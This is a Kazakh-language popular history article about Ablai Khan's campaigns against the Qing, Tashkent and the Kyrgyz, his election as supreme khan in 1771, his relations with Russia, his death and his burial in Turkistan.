1745 жылдың қыркүйегінде аяқ астынан Қалдан-Серен қайтыс болып, Жоңғарияны ішкі кикілжің құлдырата бастайды. Қытай осы сәтті дереу пайдаланбақ оймен иесіз елдің жеріне кіріп алады. Шашыраңқы ойрат әскері қытай басқыншыларына ұзақ уақыт тойтарыс бере алмады. Ақыры бір мезгілдегі мықты мемлекет құлайды. Жоңғарияны жою қатаң саясатпен жүргізіледі.
Абылай сұлтан болса кезекті соғысқа дайындала бастайды. Бұл жолы Цин империясына жол артпақ. Ол қытайлықтардың ойраттармен тоқтамайтынын, енді одан әрі, батысқа көз салатынын түсінді. Сондықтан енді әскери әрекеттерінің жоспарын мұқият ойластырмаса болмайды. Өйткені Аспан аясындағы мемлекеттің әскерінен, яғни қытайлықтардан зұлымдық пен қулық асқан емес.
Қытайлықтардан бұрын қимылдаған Абылай, баяғыда жоңғарлар тартып алған қазақ жерлерін қайтарып алады. Бұл шұрайлы Тарбағатай, Алтын-Емел және Көксу жерлері еді.
Жоңғария құлағаннан соң және қытайлықтарға қатты тойтарыс берілгеннен кейін Ұлы далада аздаған тыныштық орнады. Дегенмен, қоқан қандығымен, қырғыз манаптарымен және қарақалпақтармен ара қатынас бұрынғысынша қарама –қайшылықта қалды.
Жаулар көз ілмей, оңтайлы сәтті күтіп жатты. Осы кезде қазақ жеріндегі ішкі жағдай қиындай түскен. Әбілмәнбет хан биліктен біржола қол үзіп, Түркістанға көшті. өмірінің соңғы жылдары сонда өтті. Абылай сұлтан Орта жүздің барлық ісін мойнына алды. Ұлы Абілхайыр хан Барақпен қарсылықта қаза тапты. Бірақ Дала соты Барақты ақтап шығады. Бұл өлім қазақ қауымдастығындағы ауыр шиеленстерді білдірді. Қайғылы оқиға Абылайға да әсер етпей қоймады. Ол Әбілхайыр ханның Қарашаш деген сұлу қызына үйленген болатын.
«Бай малын қорғайды, батыр елін сақтайды» дейді халық даналығы. Абылайға Әбілхайыр ханның қазасы ғана емес, туған жерін шаршатқан дала жуандарының (байлар) бітпейтін ұрыс-таластары қатты батты. Елдің бас көтерер адамдары бір –бірімен жанжалдасса, қарапайым халықтың күйі кетіп, жағдайы нашарлайтыны түсінікті ғой. Осындай ұйқы-тұйқы жағдайдың салдары бәрінен де соларға ауыр тиді.
Осылайша, екі жылға жуық уақыт бойы (1758жылдан 1760жылға дейін) Абылай сұлтан Цин әскерімен шайқасты. Ол қайтарып алған шекаралық жерлерге байланысты Қытай қысымы тоқтатылмады. Аспан аясындағы мемлекеттің императоры қазақтың Алтын-Емел, Тарбағатай, Көксу сияқты тамаша тарихи жерлерін қолдарынан шығарып алғанына іші күйді.
Абылай кейін де қытай әскерлерімен қақтығыстарда сыннан өткен үйреншікті әдістерін қолданды. Бұл оған үнемі табыс әкелетін. Ол ашық соғыс жасамай, жау әскерін алдап, жерінің түбіне қарай кіргізіп, дүркін –дүркін, тиіп –қашып жүріп шабуылдаған. Қытайдың керемет әскері Абылайдың жылжымалы қарулы атты жасағына ілесе алмай, көп шығын мен кері оралып отырған. Абылай өз өмірінің соңына дейін осы қытаймен шекаралас жерлерде қарсыластарымен соғысудың әдіс –тәсілдерін терең үйреніп, әбден жаттыққан қарулы жасағын ұстаған.
Қытаймен қоса Абылайға Қоқан хандығы мен және Ташкентпен жауласуға тура келді. Әдетте арадағы барлық дау- жанжалдар келіссөз арқылы шешілетін. Алайда 1767жылы жағдай шиеленісіп, Абылай Ташкентке жорыққа аттанды. Негізінен, сұлтан өзбек хандарымен үш рет соғысып, үшеуінде де Ташкентті алған. Бұл жолы оған қарсы әмірші Ердене би көтеріліске шықты.
Абылай сұлтан әскерін бастап, асықпай Ортаазиялық жер иеліктеріне бет алды. Ол Ердене бидің Ташкентке жасырынып, қоршау жасап алғанын естіген. Бұл қаланы жақсы біліп алған сұлтан оның барлық бекіністерінің орны туралы да хабардар еді.
Қаланың негізгі қақпасына жақындағанда  Абылай ең соңғы рет өзбектерге созыссыз берілсін деген талаппен жаушыларын жібереді. Ердене би оған келіскісі келмейді. Сонда сұлтанның әскері қаланы қоршап алып, барлық қақпасын бір мезгілде басып алады. «Абылайлаған!» атты әскер аз ғана уақыттың ішінде қаланы өзіне қаратады. Өзбек жауынгерлері қарсыласа да алмай қалады. Пайдасыз қантөгіс тоқтатылады.
Абылай сұлтан бір кездерде айырылып қалған қазақ жерлерін қайтара бастайды. Ұлы жүз көсемдері қырғыздармен шекара  маңындағы аймақтар үшін талай уақыт дауласып жүретін. Осы дауды тоқтатпақ болған Абылай 1765 жылдың қазан айында Әбілмімбет ханның баласы Әбілфайыз сұлтанмен бірге қырғыз манаптарына қарсы жорықты бастайды. Әрине, әскер басында Абылайдың өзі еді. Бұл кездерде үлкен әскери жорықтарды ұйымдастырып, өткізу тәжірибесі жағынан оған тең келер жан болмаған және оның сарбаздары ең таңдаулы жауынгерлер деп саналған. Қырғыздарға жасаған жорық ұзаққа созылмады. Абылайдың құдіреттілігіне жақсы қанық қырғыздар ашық шайқасқа шығуға батпады. Көптеген қырғыз көсемдері соғыссыз берілуге асықты. Ал ең беделді әскербасшының бірі Қарабұта би өзінің бас игенінің белгісі ретінде ұлын Абылайға аманатқа жібереді. Сөйтіп елде біршама тыныштық орнағандай болады. Бірқатар даулы аймақ Абылайдың ұлы Әділ басқарған Ұлы жүзге беріледі. Дегенмен, осы оқиғадан кейін төрт жылдан соң қырғыздарды біржола тыныштандыру үшін Абылай жауынгерлерінің тағы да қолдарына қару алуына тура келеді.
Соғыс Шу өзені маңындағы алаңқайда өтеді. Бұл жолы әжептеуір дайындықпен келген қырғыздар батыл шайқасады. Әскер құрамының көпшілігі солту  мен бағыш руларынан шыққан сарбаздар еді және көп шығынға ұшыраған да солар болды. Осы соғыстан кейін бағыш руынан екі-ақ ауыл қалады.
Абылайдың қолбасшылық дарыны қазақ әскерін көп шығыннан сақтады. Шешуші сәтте жол таба білуге көмектесті. Кейінірікте «Жайыл қырғыны» аталған бұл соғыс қазақтардың толық жеңісімен аяқталды. Ыстықкөл маңындағы тайпалар Абылайға бағынышты болып, оның әскері Іледен Тоқмаққа дейін кедергісіз өтті. Көптеген адамдарын тұтқындап, кейін оларды Көкшетау жеріне орналастырады. Ал бір бөлігін Орталық Қазақстанда қалдырды.
Алдыңғыларды да, кейінгілерді де «бай қырғыз», «жаңа қырғыз» деп атап кетеді. Олардың ұрпақтары осы күні де сол жерлерде тұрып жатыр.
Абылайдың атағы мен даңқы Ұлы Далада ерекше құрметпен айтылды. Қазақ халқының тағдыры  мен бүкіл Орталық Азия үшін сіңірген еңбегі ұшан-теңіз. Ол өзінің білгір мәмілегер әрі жеңілуді білмейтін жауынгер екенін көрсетті. Үш жүздің басын қосу, талан-таражға түскен жерлерді қайтарып алу жолындағы ұстанған бағыты жұртшылықтың көңілінен қолдау тапты.
Қырық жылға жуық ел басқарған Әбілмәмбет қартайып, қайтыс болады. 1771 жылдың күзінде өткен құрылтай жиналысында Абылай бас хан болып сайланды. XVIII ғасырдың басында Тәуке ханның тұсында үш жүздің көрнекті сұлтандарының бірін бас хан етіп сайлау дәстүрі сақталған. Бірақ Тәуке ханнан кейін мұндай деңгейге көтерілуге Әбілқайырдың, Семекенің, Күшік пен Әбілмәмбеттің, Нұралының да қолы жетпеген. «Жеті жарғы» мен Шыңғыс ханның Яссысындағы барлық баптарды ескере отырып, тек Абылай ғана бас хан болып қабылданған.
Абылай сұлтан хан болып сайланған соң, көрші елдердің, әсіресе Ресей мен Қытайдың Қазақстанға көзқарасы өзгерді. Абылайдың алдында зор міндеттер тұрды. Ол Әбілқайырдың орындай алмай кеткен істерін жалғастыруы керек.
Абылайды бір ғана Орта жүздің ханы ретінде қабылдаған Ресей патшайымы оған хандық үкіметтің белгісін тапсырды. Мұның сыртындағы Петербургтің ішкі ойы-оның билігін шектеу екенін түсінген Абылай хан бұл белгілерді алудан бас тартты. Панин деген граф және оның басқармасы, Орынбор губернаторы И.Рейнсдорп, генерал-майор Огарев сияқты басқа да патша шенеуніктері Абылайдың халқының алдындағы абыройын түсінбеді әрі түсінгілері де келмеді. Оны төмендетуге, беделіне қайткенде күйе жағуға тырысып, небір қулыққа барды. Панин өзінің хаттарында жұмсақ тілмен Абылайға айтқан тілді алып, Орта жүзге жүргізетін билігін заң жүзінде бекітіп алуын өтінді. Ол үшін Орынборға немесе басқа да бір қалаға барып, билік белгісін алуы тиіс еді. Абылай бұған мән берген жоқ. Ол Дала Құрылтайының шешімі жеткілікті деп ойлады. Патша шенеуніктерінің дипломатиялық ойынын қабылданғанымен, Абылай билік белгісін алуға бармады. Тіпті Ресей үкіметінің «ақылға келуге» шақырған үндеулеріне құлақ та аспады.
Ақырында, патша әулеті Абылай ханды Орта жүздің билеушісі ретінде танытатын қағаз береді. Абылайдың жазда отыратын орны өз Отанында, Көкшетаудың маңында орналасқан. Әулие Қожа Ахмет Иасауидің руыхына жақын болуды көксеген ол соңғы жылдарын Түркістанда өткізеді. Екінші жағынан, ханның келуіне орай Түркістанның мәртебесі биіктеп, Жібек жолының бойында орналасқан сауда орталығы ретінде қайта өркендей бастады. Бұл жолмен жүріп жатқан көпестер керуені Қазақстанның оңтүстік қақпасына жеткенде көбіне Түркістанға келіп тоқтайтын.
Абылай дүниенің өткінші екенін білген. Сондықтан өз балаларын жасынан қасына ерітіп, жорықтарда әскери өнерлерге баулыған. Абылай құр созден көрі қимылды тәуір көрген. «Әке көрген оқ жанар» демекші Абылайдың ұлдары аты аңызға айналған әкелерін өнеге тұтып, тәлім –тәрбие алып өскен. әсіресе кейін танымал болған ұлдары Әділ, Уәли,Қасымды әкелері ерекше жақын тұтқан. Дала тарихындағы көрнекті тұлға Кенесары хан Қасымұлы –оның немересі.
Абылай хан он жыл билік жүргізді. Осы мерзім ішінде ешкімнің қолынан келе бермейтін істерді атқарды. Ол билік жүргізген он жылдың дала тарихына Абылай дәуірі боп кіруі тегін емес. Сол уақытты қазақ халқы зор құрметпен еске алады.
Ажалдың суық қолын сезген Абылай хан ордасына үш жүздің ішіндегі үзінгілес серіктерін шақыртады. Жиналған сұлтандар, сарбаздар, ақсақалдар қауымен байыппен шолып өтіп, сөзін бастайды. Әр сөзі әдеттегідей салмақты, ойлы және өрелі. Оның аузынан шыққан мірдің оғындай әрбір сөз бар жүрекке жол тапты. Жиналған адамдар оны ұзақ уақыт есте сақтады.
Абылай балаларының ішінде Уәлиге үлкен сенім артқан. Сондықтан алдымен, өзіне кейін хан орнына ең жақсы көретін ұлы Уәлиді қоюды тапсырды. Екіншіден, Даланың біртұтастығын сақтауды өсиет етті. өз өмірін халқын біріктіруге арнаған ол достары мен замандастарына өсиет етті.
Абылай хан 70 жасында өмірден қайтты. Ханды жерлеу рәсімі Түркістанда өтті. Әміршісін ақырғы сапарға аттандыруға Даланың түкпір-түкпірінен мыңдаған адамдар шұбырып келіп жатты. Ауыр қайғы бай демей кедей демей баршаның жанын күйзелтті. Сұлтанын да қарабайыр малшысын да бір ортаға біріктірді. Тарихи ұлы тұлғаның денесін Қожа Ахмет Йассауи кесенесіне қойды.
Қазақ хандығының елшілері арқылы Самарқаннан арнайы Сақып-Қыран, яғни ұлы қолбасшы Темір заманынан бері сақталған керемет көгілдір мәрмәр тас алдырып, Абылайдың басына орнатады.
Бұл мәрмәрді үш жүз сәйгүлікке айырбастаған…
Содан бері талай заман артта қалды. Қазақстан небір өзгерістерге ұшырады. Абылай ханнан кейін де көптеген саяси қайраткерлер ел басқару ісін жалғастырып, бірін – бірі алмастырып жатты. Кейбіреулері ұмыт болса, кейбір Абылай тұрғыластары халықтың жадына мәңгілік сақталды. Дала өмірі осындай дара тұлғалардың есімінсіз тарих болмас еді. Олар-еліміздің көп ғасырлық шежіресінен жарқырап көрінген біртуар азаматтар. Халық Абылай сынды ұлдарын пір тұтып, ерлігін ұрпақтан-ұрпаққа жеткізді. Бұл-ұлы Даланың мызғымас заңы, дәстүрі.

Интернет материалдарынан дайындаған:
А.Қайырбайқызы

{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика